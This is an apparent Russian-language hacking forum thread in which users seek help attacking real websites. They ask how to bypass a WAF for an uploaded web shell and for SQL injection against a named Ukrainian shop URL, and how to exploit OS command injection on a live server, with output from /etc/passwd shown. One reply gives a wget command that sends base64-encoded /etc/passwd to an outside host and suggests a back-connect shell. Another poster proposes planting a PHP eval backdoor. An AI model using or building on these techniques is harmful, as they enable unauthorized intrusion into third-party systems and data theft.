Лью шелл, когда заходишь на него, вводишь пасс, и получаешь пустую страницу или 503 код WAF? Как можно обойти?
Действовать нужно в зависимости от места внедрения. Если выше стоит легитимный Location, то известных способов в паблике нет. Бывают различные контексты и в зависимости от бекенда попадаются варианты с возможностью обхода, но нужно ресёчить. Как вариант, если ещё не видел, ознакомиться с этим райтапом https://habr.com/ru/company/pt/blog/247709/. Похоже на проблему WSO2 с PHP7, нужно выпилить set_magic_quotes_runtime.
Можете пожалуйста подсказать по данной sql-injection: Code: igum.com.ua/index.php?route=product/search_auto&tab=all_tire&height=5&diameter=6&season=%D0%B2%D1%81%D0%B5%D1%81%D0%B5%D0%B7%D0%BE%D0%BD%D0%BD%D0%B0%D1%8F&type=%D0%B2%D0%BD%D0%B5%D0%B4%D0%BE%D1%80%D0%BE%D0%B6%D0%BD%D0%B8%D0%BA&brand=68&autotype=all&width=1 Параметр: width Через sqlmap не удалось что с тамперами, что без Пробовал в ручную, но так и не сообразил как обойти и что конкретно фильтруется обратил внимание что фильтрует AND, OR и что то еще =( хотя могу ошибаться Может кто-то уже сталкивался с WAF'ом данного хостера( hostsila А то уже третий хост попадается этот и как в стену((
Есть os command inj в пост запросе, выводит uname -a : "Linux web***.******.com 2.6.32-696.16.1.el6.x86_64 #1 SMP Wed Nov 15 16:51:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux"" pwd выводит норм полный путь. ls -la выводит только первый файл "-rw-r--r--. 1 try_home try_home 25 2018-11-11 12:27 index.php" хотя файлов в дире много. И так из любой папки, только один показывает. wget и curl ничего не качают, хотя они установлены и работают (м.б. нет прав у меня?) файлы создавать не могу, читать не могу... cat "filename" показывает только последнюю строчку файла, "?>", если я пытаюсь с флагом -b, то показывает кол-во строк в файле и все. =( cat /etc/passwd -> "oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin" Тоже блин одна строка. whoami говорит что я daemon (= Чего делать то? Никакие файлы ни прочитать полностью, ни отредактировать не могу. echo >> тоже не работает. Нету скилла. Прошу помощи, куда копнуть. Премного благодарен.
auth_root, длина строки ответа различается, можешь попробовать cat index.php | base64 или перенаправить вывод на свой сервер wget "http://hek.ru/?log={`cat /etc/passwd | base64`}" но, логичный вопрос, что мешает тебе запилить бекконект и сидеть в полноценном баше
Да, так работает, спасибо. =) Чуствую спалят раньше, чем я переберу эту огромную массу информации построчно. wget (maybe в моих кривых руках) не работает. Base64 так же выводит всего по одной строке еще и обрезаной. Как запилить бэкконнект? Добавить <?php eval($_GET[cmd]); ?> в файл? Не редачит он существующие, пустые не создает, wget и curl не воркает у меня. Я Очень давно этим не занимался. Тут подбили края
